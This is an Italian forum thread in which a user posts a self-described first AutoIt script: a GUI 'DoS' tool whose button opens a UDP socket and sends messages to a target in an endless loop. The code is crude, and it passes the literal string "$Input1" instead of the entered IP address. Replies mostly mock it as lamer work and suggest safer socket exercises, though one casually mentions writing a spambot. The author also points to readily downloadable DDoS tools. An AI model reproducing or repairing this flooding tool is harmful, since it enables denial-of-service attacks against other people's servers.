[Autoit]Dos by Cyborg50

Stato
Discussione chiusa ad ulteriori risposte.

Cyborg50

Utente Silver
12 Giugno 2009
0
0
0
55
Ciao so che e uno skifo e il mio primo lavoro commenti e critiche.
#include <guiconstants.au3>
$gui = guicreate('Dos By Cyborg50',300,200)
$Input1 = GUICtrlCreateInput("Inserisci Ip", 64, 48, 161, 21)
$Distruggi = GUICtrlCreateButton("Distruggi", 64, 96, 81, 49, 0)
$Stop = GUICtrlCreateButton("Exit", 152, 96, 75, 49, 0)
guisetstate ()
while 1
switch guigetmsg()
case $GUI_EVENT_CLOSE
Exit
case $Distruggi
msgbox(4096,"Distruzione","Ok ora provvedero alla distruzione di questo server")
;;This is the UDP Client
;;Start the server first

; Start The UDP Services
;==============================================
UDPStartup()

; Open a "SOCKET"
;==============================================
$socket = UDPOpen("$Input1", 65532)
If @error <> 0 Then Exit

$n=0
While 1
$n = $n + 1
$status = UDPSend($socket, "Message #" & $n)
If $status = 0 then
MsgBox(0, "ERROR", "Error while sending UDP message: " & @error)
Exit
EndIf
WEnd
case $Stop
Exit
EndSwitch
wend
 
Malex ha detto:
Cyborg50 ha detto:
Ciao so che e uno skifo

evviva la fiducia in sè stessi...

Meglio sempre essere umili e non credersi grandi uomini :)
[ot]Ogni riferimento a personaggi o situazioni reali è puramente casuali[/ot]

P.S.: Però come primo lavoro creare un programma per dossare è un pò da lamer...e comunque ti consiglio di cambiare linguaggio se vuoi fare qualcosa di serio e/o andare avanti con la programmazione
 
ShuraBozz ha detto:
P.S.: Però come primo lavoro creare un programma per dossare è un pò da lamer...e comunque ti consiglio di cambiare linguaggio se vuoi fare qualcosa di serio e/o andare avanti con la programmazione
anzi aggiungerei che è meglio se ti dimentichi dell'esistenza dell'autoit
 
ShuraBozz ha detto:
Malex ha detto:
Cyborg50 ha detto:
Ciao so che e uno skifo

evviva la fiducia in sè stessi...

Meglio sempre essere umili e non credersi grandi uomini :)
[ot]Ogni riferimento a personaggi o situazioni reali è puramente casuali[/ot]

P.S.: Però come primo lavoro creare un programma per dossare è un pò da lamer...e comunque ti consiglio di cambiare linguaggio se vuoi fare qualcosa di serio e/o andare avanti con la programmazione

il mio messaggio era ironico... ma pensa prima di postare....
 
dai raga e il mio primo script non posso farlo benissimo piano piano migliorerò nessuno e nato imparato.

p.s shura guarda che questo programmino non da lamer ci sono tanti programmi molto piu potenti di questi non ci vuole nnt a scrivere su google download ddos ne trovi centinaia e solo un programmino cosi per imparare i socket nnt dipiu.
 
Cyborg50 ha detto:
p.s shura guarda che questo programmino non da lamer ci sono tanti programmi molto piu potenti di questi non ci vuole nnt a scrivere su google download ddos ne trovi centinaia e solo un programmino cosi per imparare i socket nnt dipiu.
Se la pensi così sei sulla cattiva strada....
 
considerazione: il fatto stesso che abbia fatto il programmino lui invece che usare uno già fatto fa sì che nn sia un lamer in senso stretto, e poi nn diamo del lamer al primo source, dai raga, se continua è un conto, ma così no.

@cyborg: per evitare incomprensioni se devi testare i socket fa qualcosa tipo per lo scmabio di file, o una chat, qualcosa insomma di nn interpretabile come lameroso.
 
Malex ha detto:
@cyborg: per evitare incomprensioni se devi testare i socket fa qualcosa tipo per lo scmabio di file, o una chat, qualcosa insomma di nn interpretabile come lameroso.

Io sopratutto eviterei di usare autoit, poi se usa un linguaggio più "serio" può fare anche uno spambot.
 
Se è il tuo primo lavoro io TI CONSIGLIO di impararti le basi prima di fare cose con i socket o con le gui...
 
Stato
Discussione chiusa ad ulteriori risposte.